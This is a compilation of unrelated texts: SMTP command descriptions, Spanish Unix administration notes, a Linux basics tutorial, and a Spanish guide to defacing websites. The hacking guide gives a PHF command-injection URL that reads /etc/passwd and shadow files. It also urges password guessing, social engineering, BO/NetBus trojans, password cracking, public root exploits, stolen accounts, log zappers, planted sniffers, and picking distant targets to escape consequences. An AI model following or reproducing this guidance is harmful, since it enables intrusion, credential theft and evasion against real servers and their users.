            the mail data is delivered to one or more mailboxes.  The 
            argument field contains a reverse-path. 
            The reverse-path consists of an optional list of hosts and 
            the sender mailbox.  When the list of hosts is present, it 
            is a "reverse" source route and indicates that the mail was 
            relayed through each host on the list (the first host in the 
            list was the most recent relay).  This list is used as a 
            source route to return non-delivery notices to the sender. 
            As each relay host adds itself to the beginning of the list, 
            it must use its name as known in the IPCE to which it is 
            relaying the mail rather than the IPCE from which the mail 
            came (if they are different).  In some types of error 
            reporting messages (for example, undeliverable mail 
            notifications) the reverse-path may be null (see Example 7). 
            This command clears the reverse-path buffer, the 
            forward-path buffer, and the mail data buffer; and inserts 
            the reverse-path information from this command into the 
            reverse-path buffer. 
Sintax: MAIL <SP> FROM:<reverse-path> <CRLF>
RECIPIENT (RCPT) 
            This command is used to identify an individual recipient of 
            the mail data; multiple recipients are specified by multiple 
            use of this command. 
            The forward-path consists of an optional list of hosts and a 
            required destination mailbox.  When the list of hosts is 
            present, it is a source route and indicates that the mail 
            must be relayed to the next host on the list.  If the 
            receiver-SMTP does not implement the relay function it may 
            user the same reply it would for an unknown local user 
            (550). 
            When mail is relayed, the relay host must remove itself from 
            the beginning forward-path and put itself at the beginning 
            of the reverse-path.  When mail reaches its ultimate 
            destination (the forward-path contains only a destination 
            mailbox), the receiver-SMTP inserts it into the destination 
            mailbox in accordance with its host mail conventions. 
Sintax: RCPT <SP> TO:<forward-path> <CRLF>
DATA (DATA) 
            The receiver treats the lines following the command as mail 
            data from the sender.  This command causes the mail data 
            from this command to be appended to the mail data buffer. 
            The mail data may contain any of the 128 ASCII character 
            codes.The mail data is terminated by a line containing only a 
            period, that is the character sequence "<CRLF>.<CRLF>" (see 
            Section 4.5.2 on Transparency).  This is the end of mail 
            data indication. 
Sintax: DATA <CRLF>
 SEND (SEND) 
            This command is used to initiate a mail transaction in which 
            the mail data is delivered to one or more terminals.  The 
            argument field contains a reverse-path.  This command is 
            successful if the message is delivered to a terminal. 
            The reverse-path consists of an optional list of hosts and 
            the sender mailbox.  When the list of hosts is present, it 
            is a "reverse" source route and indicates that the mail was 
            relayed through each host on the list (the first host in the 
            list was the most recent relay).  This list is used as a 
            source route to return non-delivery notices to the sender. 
            As each relay host adds itself to the beginning of the list, 
            it must use its name as known in the IPCE to which it is 
            relaying the mail rather than the IPCE from which the mail 
            came (if they are different). 
            This command clears the reverse-path buffer, the 
            forward-path buffer, and the mail data buffer; and inserts 
            the reverse-path information from this command into the 
            reverse-path buffer. 
Sintax: SEND <SP> FROM:<reverse-path> <CRLF>
SEND OR MAIL (SOML) 
            This command is used to initiate a mail transaction in which 
            the mail data is delivered to one or more terminals or 
            mailboxes. For each recipient the mail data is delivered to 
            the recipient's terminal if the recipient is active on the 
            host (and accepting terminal messages), otherwise to the 
            recipient's mailbox.  The argument field contains a 
            reverse-path.  This command is successful if the message is 
            delivered to a terminal or the mailbox. 
           The reverse-path consists of an optional list of hosts and 
            the sender mailbox.  When the list of hosts is present, it 
            is a "reverse" source route and indicates that the mail was 
            relayed through each host on the list (the first host in the 
            list was the most recent relay).  This list is used as a 
            source route to return non-delivery notices to the sender. 
            As each relay host adds itself to the beginning of the list, 
            it must use its name as known in the IPCE to which it is 
            relaying the mail rather than the IPCE from which the mail 
            came (if they are different). 
            This command clears the reverse-path buffer, the 
            forward-path buffer, and the mail data buffer; and inserts 
            the reverse-path information from this command into the 
            reverse-path buffer. 
Sintax: SOML <SP> FROM:<reverse-path> <CRLF> 
 
 SEND AND MAIL (SAML) 
            This command is used to initiate a mail transaction in which 
            the mail data is delivered to one or more terminals and 
            mailboxes. For each recipient the mail data is delivered to 
            the recipient's terminal if the recipient is active on the 
            host (and accepting terminal messages), and for all 
            recipients to the recipient's mailbox.  The argument field 
            contains a reverse-path.  This command is successful if the 
            message is delivered to the mailbox. 
            The reverse-path consists of an optional list of hosts and 
            the sender mailbox.  When the list of hosts is present, it 
            is a "reverse" source route and indicates that the mail was 
            relayed through each host on the list (the first host in the 
            list was the most recent relay).  This list is used as a 
            source route to return non-delivery notices to the sender. 
            As each relay host adds itself to the beginning of the list, 
            it must use its name as known in the IPCE to which it is 
            relaying the mail rather than the IPCE from which the mail 
            came (if they are different). 
            This command clears the reverse-path buffer, the 
            forward-path buffer, and the mail data buffer; and inserts 
            the reverse-path information from this command into the 
            reverse-path buffer. 
Sintax: SAML <SP> FROM:<reverse-path> <CRLF>
RESET (RSET) 
            This command specifies that the current mail transaction is 
            to be aborted.  Any stored sender, recipients, and mail data 
            must be discarded, and all buffers and state tables cleared. 
            The receiver must send an OK reply. 
Sintax: RSET <CRLF> 
 
VERIFY (VRFY) 
            This command asks the receiver to confirm that the argument 
            identifies a user.  If it is a user name, the full name of 
            the user (if known) and the fully specified mailbox are 
            returned. 
            This command has no effect on any of the reverse-path 
            buffer, the forward-path buffer, or the mail data buffer. 
 Sintax: VRFY <SP> <string> <CRLF> 
 
 EXPAND (EXPN) 
            This command asks the receiver to confirm that the argument 
            identifies a mailing list, and if so, to return the 
            membership of that list.  The full name of the users (if 
            known) and the fully specified mailboxes are returned in a 
            multiline reply. 
            This command has no effect on any of the reverse-path 
            buffer, the forward-path buffer, or the mail data buffer. 
Sintax: EXPN <SP> <string> <CRLF>
 HELP (HELP) 
            This command causes the receiver to send helpful information 
            to the sender of the HELP command.  The command may take an 
            argument (e.g., any command name) and return more specific 
            information as a response. 
            This command has no effect on any of the reverse-path 
            buffer, the forward-path buffer, or the mail data buffer. 
Sintax: HELP [<SP> <string>] <CRLF> 
 
NOOP (NOOP) 
            This command does not affect any parameters or previously 
            entered commands.  It specifies no action other than that 
            the receiver send an OK reply. 
            This command has no effect on any of the reverse-path 
            buffer, the forward-path buffer, or the mail data buffer. 
Sintax: NOOP <CRLF>
QUIT (QUIT) 
            This command specifies that the receiver must send an OK 
            reply, and then close the transmission channel. 
            The receiver should not close the transmission channel until 
            it receives and replies to a QUIT command (even if there was 
            an error).  The sender should not close the transmission 
            channel until it send a QUIT command and receives the reply 
            (even if there was an error response to a previous command). 
            If the connection is closed prematurely the receiver should 
            act as if a RSET command had been received (canceling any 
            pending transaction, but not undoing any previously 
            completed transaction), the sender should act as if the 
            command or transaction in progress had received a temporary 
            error (4xx). 
Sintax: QUIT <CRLF>
 TURN (TURN) 
            This command specifies that the receiver must either (1) 
            send an OK reply and then take on the role of the 
            sender-SMTP, or (2) send a refusal reply and retain the role 
            of the receiver-SMTP. 
            If program-A is currently the sender-SMTP and it sends the 
            TURN command and receives an OK reply (250) then program-A 
            becomes the receiver-SMTP.  Program-A is then in the initial 
            state as if the transmission channel just opened, and it 
            then sends the 220 service ready greeting. 
            If program-B is currently the receiver-SMTP and it receives 
            the TURN command and sends an OK reply (250) then program-B 
            becomes the sender-SMTP.  Program-B is then in the initial 
            state as if the transmission channel just opened, and it 
            then expects to receive the 220 service ready greeting. 
            To refuse to change roles the receiver sends the 502 reply 
Sintax: TURN <CRLF>

ADMINISTRACION BASICA DE SISTEMA UNIX
* Planificacion de ordenes

mandato cron

Cron es un demonio del sistema que se encarga de gestionar (ejecutar en instantes concretos y regularmente) todo los ficheros de mandatos creados con la orden cronta crontab.

mandato crontab

Indica al proceso cron que existe un fichero con ordenes a ejecutar en periodos regulares.
crontab [-rl] [fichero]

La opcion -l lista el contenido del fichero contrab actual.

* Planificacion de ordenes

la opcion -r, cambia a otro fichero - contrab. Si hay un fichero /usr/lib/cron/cron.allow todos los usuarios contenidos en el podran usar crontab. en el fichero cron.diny averiguaremos quienes no pueden utilizar la orden. Esta orden se utiliza cuando se quiere ejecutar ordenes en momentos de poca carga del sistema:

- copias de seguridad.
- informes de actividad
- eleminacion de archivos antiguos o demasiado extensos.
Cada linea de un fichero crontab consta de 6 campos, separados por espacios o tabuladores.

minutos horas dia mes mes dia semana orden a ejecutar
------- ----- ------- --- ---------- ----------------
0-59 0-23 1-31 (*) 1-12 (*) 0-6 (*) programa

ejm:

$vi croneunix01
00 17 * * 1 /usr/unixXX/factorial

Mandato at
----------

Ejecuta un grupo de ordenes en un instante concreto.
Sintasis:

at [-l] [-r numero] [hora] [fecha] [+incremento]

-l informa al usuario de los trabajos pendientes de ejecucion
-r permite eliminar un trabajo de la lista de espera (indicando el nº de trabajo)

* La hora se indica con el formato 24 horas (hh:mm), o bien con el sufijo am y pm. Tb se puede utilizar: now, midnight, moon, next.

* El incremento es un nº seguido de las palabras minutes, hours, days, week, mouths, years.

ejm:

$ at now +1 minutes
write unixXX > fichero
^D

mandato ps
----------

Inofrma del estdo de los procesos en ejecucion por la CPU.
parametros:

-e informa de todos los procesos
-f listado completo
-l formato largo
-u [usuario] procesos de un usuario
-g [grupo] procesos de un grupo
-a todos los usuarios

Ejm: Visualizar los procesos de root

ps -u root

mandato kill
------------

Envia una señal especifica al proceso indicado las señales son:

0 salida del shell
1 salir del sistema
2 interrupcion del programa
9 muerte segura, no puede ser ignorada
15 señal de acabar del software

sintasis:

kill [-señal] PID
mandato trap
------------

Se puede usar para ignorar las señales o pra redefinir la accion a tomar dentro de un programa shell.

Sintasis:

trap cadena_de_ordenes lista_de_señales

Ejm: 

trap 'echo no puede interrumpirse' 2 (muestra el mensaje cuando se quiere parar el script)
trap "2 (no se para)
trap 2 (deshabilita la programacion de la señal 2)
trap (muestra las señales que estan programadas)

mandato uname
-------------

Devuelve informacion
mandato who
-----------
Da informacion sobre el funcionameinto de la maquina.
parametros:

-u lista los usuarios conectaods (PID DEL SHELL)
-q solo nombres y lista de usuario
-b da la hora y fecha de la ultima puesta en funcionamiento
-r visualiza el estado actual de funcionamiento
-t el ultimo cambio de reloj del sistema
-l lineas den las que el sistema esta esparando para que alguien se concecte
-a todo lo anterior.
-T Indica si se puede escribir en los terminales o no.

mandato logins
--------------

Visualiza los logins de todos los usuarios, grupos y sus ID

mandato du
----------

Indica el espacio usado a pertir del directorio actual o el indicado.
Parametros:

-a Indica el tamaño de cada fichero
-s Solo el total
-r Indica problemas de acceso a ficheros o directorio

sintasis:

du [-a -s -r] [directorio]

mandato sar
----------

Recoge una amplia variedad de informacion sobre la activaidad del sistema.
parametros:

-d muestra la actividad de los discos.
-u muestra la actividad de la unidad central.
mandato df
----------

Informa del espacio libre en un sistema de ficheros en bloques de 512 bytes.
Parametros:

-v porcentaje de bloques usados y numero de ellos.
-t espacio total.

Sintasis:

df [-v -t] [sistema de ficheros]

parada del sistema
------------------

Es necesario parar controladamente el sistema: no se debe apagar la makina sin mas ya que los sistemas de ficheros quedarian dañados.
Ordenes:

reeboot Para y reinicia el S.O.
halfsys Detiene el sistema inmediatamente
shutdown Pide un periodo de gracia de varios minutos
antes de parar completamente el sistema. lo comunica a todos los usuarios

opcion:

-y No pide confirmacion
-g [hh:mm] Tiempo que queda para detener el sistema
-f mensaje Mensaje para las terminales

DISPOSITIVOS
------------

El sistema se comunica con los penrifericos a traves de drivers situados todos ellos en el directorio /dev.
Para los disquetes todos ellos empiezan por fd

ejm:

lc /dev/fd


Hackear Paginas WEB:
* Introducción
* Diferencias en los tipos de WEB
* Obteniendo Passwords en el tipo A.
* Obteniendo Passwords en el tipo B.
* Precauciones.
* Sobre el autor 




1º INTRODUCIÓN
El objetivo de este documento es el dar a conocer posibles formas de alteración del contenido de una página WEB por personal no autorizado a ello ( llamémoslo hacking ;)).
No me hago responsable del uso que se pueda hacer de este documento, pues su única finalidad es la de informar, y el que lo use para otra cosa... lo hace bajo SU entera responsabilidad... ¿ Queda claro ?, si no te parece bien deja de leer y borra el fichero de tu HD ( disco duro para los muy novatos...).

Las cosas que se describen en este fichero no te aseguran éxito seguro, probablemente en la mayoría de los casos solo te sirvan para empezar, teniendo que improvisar tu, pero prometo que este doc. será mejor que los que he visto sobre el tema en Internet.

El nivel de este documento es básico, pues no intenta enseñar todo en un dia, mas que nada saber como empezar a hacer algo digamos "util".

Nota: A pesar de que podras hacer todo lo que aquí pone desde Windows 95 o 98, te recomiendo que pruebes algun Linux (aunque sea el Trinux, que cabe en 3 disketes x´PPP (www.trinux.org)). Este documento esta escrito en WORD pk lo tiene todo cristo ( jeje casi todos ilegal para que se joda Microsoft (con perdon)).



2º DIFERENCIAS ENTRE TIPOS DE WEBs

Creo que para que nos entendamos mejor, es importante distinguir entre dos clases de WEBs, las webs personales, que pueden ser modificadas por el usuario propietario mediante su clave (tipo Geocities, Xoom y los proveedores de acceso a Inet que ofrecen espacio WEB).
El segundo tipo, serian aquellas WEBs, llamemoslas "principales" de un servidor, que solo pueden ser modificadas por usuarios con muy altos privilegios (llamemosles "root" o "administrador").
Pues que bien ¿no?, y esta diferenciación tan chorra... ¿para que vale?... pues la utilizaremos para diferenciar las formas de hacernos con los passwords que nos dejan modificarlas... evidentemente no es igual de facil conseguir ser root en un server que tener una cuenta de usuario... asi que para esto es la diferenciación.


3º OBTENIENDO PASSWORDS DE TIPO A (USUARIO):

Estos passwords de usuarios, generalmente no muy cualificados, se caracterizan por ser muy chorras, osea faciles de recordar, repetidos con los passwords de otras cosas... asi que si la persona propietaria de las WEB es alguien cercano a ti, puedes empezar provando algunas palabras que te puedan parecer "interesantes" ( nombre del perro, mujer, hijos, fecha de nacimiento, lugar de residencia...), pero tampoco te mates mucho provando pues esto es perder el tiempo muchas veces, asi que si a los 10 o 11 intentos ( según tu paciencia ) no sale nada, mejor dejes esta forma ;)
Pero también seria una buena idea intentar sacar el password a la "victima" a traves de engaños y demas ( lo llaman ingenieria social...), por ejemplo puedes ligarte al tio/a y conseguir que te diga su pass... o tambien puedes intentar meterle un troyano tipo BO o NETBUS, que te permitiran sacarle las pass, evidentemente no voy a contar aquí lo que le tienes que decir a la victima para que te crea... eso tendras que currelarlo tu un pokito

Ademas, si conseguimos el fichero de passwords del servidor... ¡¡Estamos de suerte!! Pues generalmente los passwords de usuario son bastante fáciles de crackear... solo elige el usuario y pon el john the ripper a trabajar ( el john es uno de los programas de cracking de ficheros PASSWD de UNIX mas conocidos, puedes conseguirlo en www.geocities.com/SiliconValley/Peaks/7837 , si no sabes usarlo... DON´T WORRY, trae ayuda...).
Pero probablemente el problema no sea el uso del John, sino el conseguir el fichero PASSWD, asi que para eso vamos al siguiente apartado de este cursillo.


3º OBTENIENDO PASSWORDS DE TIPO B (root):

Normalmente los administradores de los servidores no se chupan el dedo, asi que conseguir el fichero o el root directamente a traves de un exploit ( programa que se aprovecha de un BUG o agujero en el sistema operativo) no sea una tarea facil.

Lo primero que puedes intentar es pillar el passwd por el FTP... y cuando eso no te haya funcionado probar el PHF ( escribir la siguiente linea en tu navegador: http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd , donde host.com es el nombre del servidor...), si el phf funcionase ( en estos tiempos ya suele estar parcheado en casi todos los servidores, asi que si no te sirve no te deprimas), tendrias en tu pantalla el fichero passwd, pero antes de alegrarte fijate en algo, si aparece:

root:*:0:0:Charlie &:/root:/bin/csh

( un asterisco (*) detrás del nombre "root" y los dos puntos, también puede aparecer una equis (x)...), querra decir que el fichero esta shadow osea que aparte del PASSWD necesitas otro archivo... el SHADOW, puedes intentar sacarlo con PHF cambiando la palabra passwd del final de la linea del PHF por la palabra shadow ( para ser un poco mas explicito puedes jugar con el phf, cambiando de directorio... supongo que te estaras dando cuenta de cómo y si no, hay va una pista... "etc" es el nombre de un directorio ).

Buiino, si lo anterior no ha funcionado, no te preocupes, aún tenemos mas bazas que jugar.
Si por cualquier casualidad de la vida posees una cuenta de usuario en el servidor, puedes intentar hacerte con el passwd ( y con el shadow si hace falta) a traves de telnet ( prueba con cat o more , para ver si Dios es tu amigo y puedes editar los archivos...) o, puedes enterarte del Sistema operativo que usa el server, version ... (enterate también de la version del STMP, FTP ...) y vete a buscar exploits ( ya explique antes lo que son exploits...).
Una vez que lo/s tengas pues... los pruebas!!! ¿Sino para que coño los has cojido?... para provarlos, primero tendras que compilarlos ( ojo, hay sploits que no hay que compilar, pues simplemente consisten en teclear unos comandos o algo asi... jeje si tienes algo de esperiencia seguro que recuerdas algunos viejos compañeros ;) ).
Un buen sitio para pillar exploits es: http://www.rootshell.com/ 

¿ Y donde los compilo ?, pues o el propio server ( con gcc ) o en otro con el mismo SO, ojo no puedes compilar exploits para un SUN en un linux Red Hat ... una vez que lo tengas compilado lo ejecutas... y a ¡jugar!

Despues de todo esto, y otro poco por tu parte seguramente ya tengas root en algun pequeño server para provar... (recuerda si no tienes mucha soltura... empieza por china o por alli lejotes... que si te pillan no se meteran mucho contigo ¿verdad?).

4º PRECAUCIONES


Pues eso... procura no usar cuentas verdaderas para conectar ( aunque piensa que si dejas huellas... los marrones seran pal dueño de la cuenta, y eso no esta bien..., asi que cuidado con las cuentas de internet robadas, solo usar las que sepais que el dueño es un verdadero hijoputa o algo asi... o mejor si usas servidores "intermedios" o borras las huellas con algun zapper ( si lo usas sastamente como un exploit)... ahh, si te kurrelas un root y tal, pues deja algun sniffer y eso para recoger la cosecha... ( mas ke na no desperdiciar kurro ya hecho).


5º SOBRE EL AUTOR


Pues el capullo que escribe todo esto es CHEvARA, individuo que podreis encontrar en el IRC hispano por #scripting, #hack o #comunistas, cuya WEB por si quieres verla es:

www.geocities.com/SiliconValley/Peaks/7837 y e-mail por si tenes algo que comentar:

chevara@hotmail.com .

Me he decidido a escribir esto simplemente porque ley un doc sobre el tema tan malo que me dije... por muy mal que lo haga yo seguro que queda algo mas "util", y aquí esta, espero que a alguien le sirva de algo...



3 º USO BASICO DEL SISTEMA:
3º - 1 : CREANDO USUARIOS
La primera vez que accedamos a nuestro sistema linux, lo haremos poniendo la palabra root como " login " y no pondremos passwords ( o pondremos el que hayamos definido en la instalación ), " root " es la identificación que se le da al administrador del sistema, y no es conveniente acceder como tal al sistema, a no ser que sea necesario, pues el root es la única persona que podra hacer algo dañino para el sistema ( otra ventaja de linux, el cabreode tu hermano por no dejarle jugar al Quake no te puede costar el trabajo de meses ... ).
La primera vez que entremos es necesario acceder como root, pues no hay otros usuarios definidos, para hacer esto, añadir usuarios, simplemente hacemos:
#adduser NOMBRE
donde nombre sera la identificación del usuario, una vez hecho esto, le otorgamos una clave al usuario:
#passwd NOMBRE
se nos pide la clave, y despues una comprovación de la misma.
Ahora ya podemos cambiarnos a el nuevo usuario, simplemente ponemos:
#su NOMBRE
Siendo root, podemos pasar a ser cualquier usuario que deseemos, pero siendo un usuario normal, para pasar a root, habra que introducir la clave de root.
Nota: Se dispone de la posibilidad de usar varios usuarios al tiempo, a traves de la terminales virtuales, simplemente vamos de una a otra con las teclas ALT + F1... (hasta F6).
También seria recomendable, modificar los datos personales de cada usuario, que se haria, de la siguiente forma:
(Cambiandola el propio usuario)
/home/jose$ chfn
El sistema nos ira preguntando los datos del usuario, tales como nombre, teléfono ... esta información podra ser visualizada por cualquier usuario del sistema a traves del comando:
/home/jose$ finger usuario
Ademas, se puede hacer, que cuando algun usuario nos haga un finger, le aparezca un mensaje adicional, este mensaje es el " plan ", y se define simplemente, escribiendo el mensaje, en un fichero al que llamaremos " .plan " , dentro del directorio personal del usuario.
Nota: Recordemos que linux es Case sensitive, esto quiere decir que " Pedro " y " pedro " son usuarios distintos, dependiendo de las mayusculas.
3º- 2 : OLVIDADA LA CLAVE DE ROOT !!
¿y si se me olvida la password del root?, bueno, hay una forma de poder cambiarla, simplemente reiniciamos con un diskete de instalación de linux, que nos dara root por defecto ( para instalar hay que serlo ), una vez accedamos al sistema como root, editamos el fichero /etc/passwd, borrando la clave encriptada del root. Si nuestro sistema dispone de la opción de seguridad shadow para el fichero passwd ( esto es, que las claves, en vez de guardarse en /etc/passwd, fichero con permisos de lectuara para todos, se sustituyen en /etc/passwd pon una " x " o un " * " y la clave encriptada se guarda en el fichero /etc/shadow, fichero con permisos solo para root), tendremos que borrar esta clave del fichero /etc/shadow. Una vez hecho esto, reiniciamos, hacemos login como root y no metemos clave (damos al enter), habremos entrado como root sin passord, ahora debemos teclear 
#passwd
para definir de nuevo la clave.
 
3º- 3 : FICHEROS Y DIRECTORIOS
3º - 3 - 1 : Cambiar de directorio:
Cuando hacemos login en linux, iremos al directorio base del usuario con el que hagamos login, por ejemplo, si lo hacemos como " root " iremos a /root , si lo hacemos como " jose " iremos al directorio /home/jose ... en ese direcctorio base es en el que debemos instalar nuestros programas, compilar, editar archivos... Para cambiar de directorio, lo hacemos al igual que en ms-dos, con el comando " cd ".
Por ejemplo si estamos en /home/jose y queremos ir a /home/jose/a , simplemente ponemos cd a ; pero si queremos ir a /etc , pues ponemos cd /etc , la " / " indica directorio hijo, por ejemplo si no hay nada delante de " / ", quiere decir que ese directorio cuelga directamente de la raiz, pero por ejemplo en /etc/ppp , ppp cuelga de /etc...
Para volver al directorio padre, ponemos " cd .. " y para ir al raiz, ponemos " cd / ".
También podemos referirnos a la ruta actual con " .. ", por ejemplo, en el caso anterior, estando en " /home/jose ", para ir a " /home/jose/a ", podemos poner " cd ../a ". Asimismo, si ponemos solamente " cd ", iremos al direcctorio base del usuario con el que hayamos hecho login.
NOTA: En linux, como se vera mas adelante, existen los llamados permisos, que filtran el uso de ficheros o directorios por parte de usuarios. El dueño del fichero y el root, pueden definir estos permisos a su antojo, con la única salvedad de que para el root no existen permisos, el puede leer cualquier cosa que haya en el sistema... si, incluso tu e-mail personal, por tanto el root, no puede ser cualquier persona, sino alguien con responsabilidad y respeto por los demas usuarios. Esto a nivel domestico no tiene mucha importancia...bueno, quiza a tu hermana le moleste que le leas los e-mails del novio... pero, imaginate en un sistema con 5.000 usuarios... o en tu propio proveedor de acceso a internet..., pero volviendo a nuestro tema, quiza no puedas entrar a algun directorio, pues no tengas permiso para ello.
3º - 3 - 2 : Listar el contenido de un directorio:
Esto se hace a traves del comando:
ls [-alF] [--color] [directorio/s] [fichero/s]
Por ejemplo para ver el contenido de /etc , si nos encontramos en el, simplemente hariamos:
/etc$ ls
Los parametros que se le pueden pasar al comando son:
 
Parametro
Acción
 
 
-a
Muestra ficheros ocultos
 
 
-l
Muestra los permisos de los ficheros que son listados
 
 
-F
Distingue entre tipos de archivos, por ejemplo a los binarios o ejecutables les coloca un " * " detras
 
 
--color
Igual que " -F " , pero diferenciando los tipos de ficheros o subdirectorios por colores.
 
 
 
 
 
3º - 3 - 3 : Ver la ruta donde nos encontramos:
Para saber donde nos encontramos, tecleamos:
$pwd
Este comando nos devuelve la ruta actual en la que nos encontramos.
3º - 3 - 4 : Crear Directorios:
Esta tarea la realizaremos con el comando:
mkdir -p [directorio]
Con el parametro " -p ", indicamos que de no existir parte de la estructura donde se quiere crear el directorio, debe ser creada.
Por ejemplo si queremos crear " /etc/ppp/conexion/clave " y no existe " /conexion " seria necesario.
Para crear un directorio hijo al que nos encontramos, simplemente " mkdir [directorio] ".
3º - 3 - 5 : Borrar Directorios:
Hay dos formas para realizar esto:
rmdir [directorio] ( solo borra ficheros vacios, no se explicara mas sobre este comando)
o
rm [-friv] nombre (para borrar directorios y ficheros)
Los parametros de rm son :
 
Parámetro 
Función
 
 
-f
No pide confirmación
 
 
-r
Borrado recursivo de archivos y directorios
 
 
-v
Se muestra lo que se va borrando
 
 
-i
Se pide confirmación para cada fichero o directorio
 
 
 
 
 
3º - 3 - 6 : Copiar ficheros:
Cuyo formato básico es:
cp [origen] [destino]
Existen parametros para este comando que pueden ser consultados a traves de las páginas de manual de linux (explicación mas adelante en el documento ).
3º - 3 - 7 : Mover/Renombrar ficheros:
Ambas acciones se realizan a través del comando:
mv [origen] [destino]
Si lo que se quiere es renombrar el fichero, el destino sera el mismo directorio pero un nombre de archivo diferente.
Al igual que para " cp ", se deben consultar las páginas del manual en linea de Linux para obtener mas parametros.
Nota: Evidentemente, los usos de los comandos anteriores variaran dependiendo de los permisos que tengan los ficheros o directorios sobre los que se quieran aplicar.
3º - 3 - 8 : Caracteres comodines:
Como son " * " y " ? ", habituales en ms-dos, " * " se refiere a una cadena de caracteres y " ? " a un solo caracter.
Por ejemplo:
$ ls h*
listara todos los ficheros que empiezen por h de la ruta actual, y:
$ ls cas?
listara todos los ficheros que empiezen por cas, tengan 4 letras, y acaben por cualquier caracter.
3º - 3 - 9 : Ejecutar y editar ficheros:
Para ejecutar un archivo binario, simplemente tecleamos su ruta completa o nos situamos en el directorio donde se encuentra y tecleamos su nombre precedido de un punto y una barra ( " ./fichero.binario " ), si el fichero se encuentra en la linea del PATH, no hara falta el punto y la barra.
Mientras tanto, para editar un fichero, necesitamos de un editor, existen muchos, tales como " vi " , " joe " o " emacs ", todos con ayuda propia, por lo que no seran comentados aquí.
3º - 3 - 10 : Ver el contenido de un fichero:
Para ver el contenido de los ficheros, aparte de los editores, existen tres comandos:
 
 
 
 
 
 
- cat
 
Muestra el contenido de un fichero de una 
sola tirada.
 
 
- more .
 
Muestra el contenido tramo a tramo.
 
 
- less
 
Igual que more, pero permite movernos
por el fichero con los cursores.
 
 
 
 
 
 
Con cat, también podremos redireccionar la salida a otro fichero o dispositivo, por ejemplo:
$ cat casa > coche 
Añadira el contenido de el fichero " casa " a " coche ".
3º - 3 - 11 : Permisos:
En linux, la posibilidad de uso de un fichero o directorio, viene determinada por los permisos que tenga. Para el root o administrador, estos permisos no existen, pues tiene acceso a todo, pero todos los demas usuarios del sistema, se ven restringidos por los permisos, lo que ayuda en la privacidad de cada usuario.
Basicamente, existen tres tipos de permisos para los ficheros y direcctorios, aunque existen otros "especiales":
* Lectura ( r ). 
* Escritura ( w ). 
* Ejecución ( x ). 
Creo que esta claro a que se refiere cada permiso, ahora vamos a ver como funcionan estos:
Para ello hacemos un ls -l en el directorio actual:
$ ls -l
-rwxr-xr-x 1 root bin 56722 Jun 23 1996 /home/chevara/prog
De momento solo nos fijamos en el primer grupo de cosas: 
-rwxr-xr-x
El primer guion, nos dice el tipo de fichero.
Los 3 siguientes caracteres, nos dicen los permisos del propietario.
Los siguientes 3, los permisos del grupo al que pertenece el propietario.
Y los 3 ultimos los permisos del resto de propietarios.
Para otorgar permisos se usa el comando chmod, cuya sintasis es:
chmod ugoa+-=rwxugo fichero
u
Se refiere al propietario del fichero
g
Se refiere al grupo.
o
Se refiere a los que no son ni grupo ni propietario
a
Se refiere a todos
+
Otorga permisos
-
Quita permisos
=
Los iguala a los de los usuarios que aparecen al final (segundo "ugo")
r,w,x
Los permisos en si.
Ademas, se pueden modificar los permisos a traves de una mascara que es:
Usuario
r = 4
w = 2
x = 1
Grupo
r= 4
w=2
x=1
Otros
r=4
w=2
x=1
Y para asignarlos, se sustituyen los permisos por numeros, por ejemplo, para rwxr-xr-x hariamos:
rwx = 4 + 2 + 1 = 7
r-x=4 + 1 = 5
r-x=4 + 1 = 5 
Con lo que para otorgar estos permisos a un archivo solo tendriamos que hacer:
$ chmod 755 archivo
3º - 3 - 12 : Montar y desmontar:
Como ya se dijo antes en linux, cada dispositivo hardware se trata igual que un directorio, por tanto, habra que definir cual es este direcctorio para poder entrar a el si queremos leer datos...
Esto se realiza a traves del comando " mount ", el uso básico de este comando es:
mount -t tipo origen destino
Por ejemplo, para montar el CD-ROM en /cdrom , hariamos:
$ mount -t iso9660 /dev/cdrom /cdrom
Y, para montar la partición de Windows 95, suponiendo que esta es " hda1 ", hariamos:
$ mount -t vfat /dev/hda1 /windows
Con:
$ mount /dev/fhd0 /mnt/floppy
Montariamos la unidad de disquetes...
Para desmontar, usamos el comando " umount " , por ejemplo, para desmontar los dos ejemplos anteriores hariamos:
$ umount /cdrom
$ umount /windows

3º - 3 - 13 : Ver y matar procesos:
Los procesos no son mas que programas en funcionamiento, para poder apagarlos o "matarlos" en la jerga de linux, primero necesitamos saber su PID, que lo obtenemos a traves del comando:
$ ps
De la lista obtenida, buscamos el PID del proceso en cuestión y lo matamos, simplemente con:
$ kill PID
3º - 3 - 14 : Alias y Pipes:
Los alias o sobrenombres, nos permiten crear comandos que se ejecuten con parametros predeterminados...
Por ejemplo, si somos usuarios de ms-dos, y nos gusta mas teclear md en lugar de mkdir, pues podemos hacer un alias de la siguiente forma:
$ alias md="mkdir"
Ademas, otro uso inteligente, es crear alias para cosas que no queremos escribir muchas veces, por ejemplo:
$ alias amigos="pedro, jose, juan, luis"
Nos permitiria enviar un mensaje a todos con:
$ mail amigos
(Ejemplo obtenido del Libro: "Linux", de César Martín e Ismael Pérez, de la editorial Anaya Multimedia, el cual encontre ayer en la biblioteca y hoy me he comprado, pues esta muy bien, y lo recomiendo ;)).
A traves de los pipes ( la llamada fontaneria en Linux ), podremos ejecutar varios comandos al tiempo, separandolos en la linea de comandos por " | " .
3º - 3 - 15 : AYUDA:
Linux, incluye un sistema de ayuda, al que podremos acceder a traves man. Para aprender como usarla, lo mejor es ver la ayuda de la propia ayuda, para lo que hariamos:
$ man man
3º - 4 : ESPACIO LIBRE:
En linux, a diferencia de en ms-dos, no nos aparece el espacio libre del que disponemos al hacer un simple dir, pero disponemos de dos comandos que nos diran el espacio libre, tanto en HD, como en memoria ( RAM + SWAP). 
Para el espacio en disco, utilizamos el comando :
$ df
Mientras que para la memoria, utilizamos:
$ free [-b] [-k]
Donde, añadiendo -b , se nos mostraria en bytes, y con -k en kilobytes
3º - 5 : COMPRIMIR Y DESCOMPRIMIR CON " TAR " Y "GZIP"
3º - 5 - 1 : COMPRIMIR
Comprimir ficheros es algo muy util, ya que nos facilita la tarea de adquirir software y la de distribuirlo, ademas de realizar copias de seguridad o almacenar datos.
En Linux, para llevar a cabo esta tarea, se suelen utilizar dos herramientas al tiempo, tar y gzip, la primera, se encarga de empaquetar los ficheros en uno solo, pero sin comprimirlos, y la segunda es la encargada de comprimirlos.
Primero vamos a explicar como empaquetar con tar:
$ tar cvf destino.tar origen
Donde " c " indica que ha de crearse un archivo .tar, " v ", es para que se muestre por pantalla lo que tar va haciendo, y " f ", dirige tar al fichero que le sigue. Es recomendable usar las opciones en este orden.
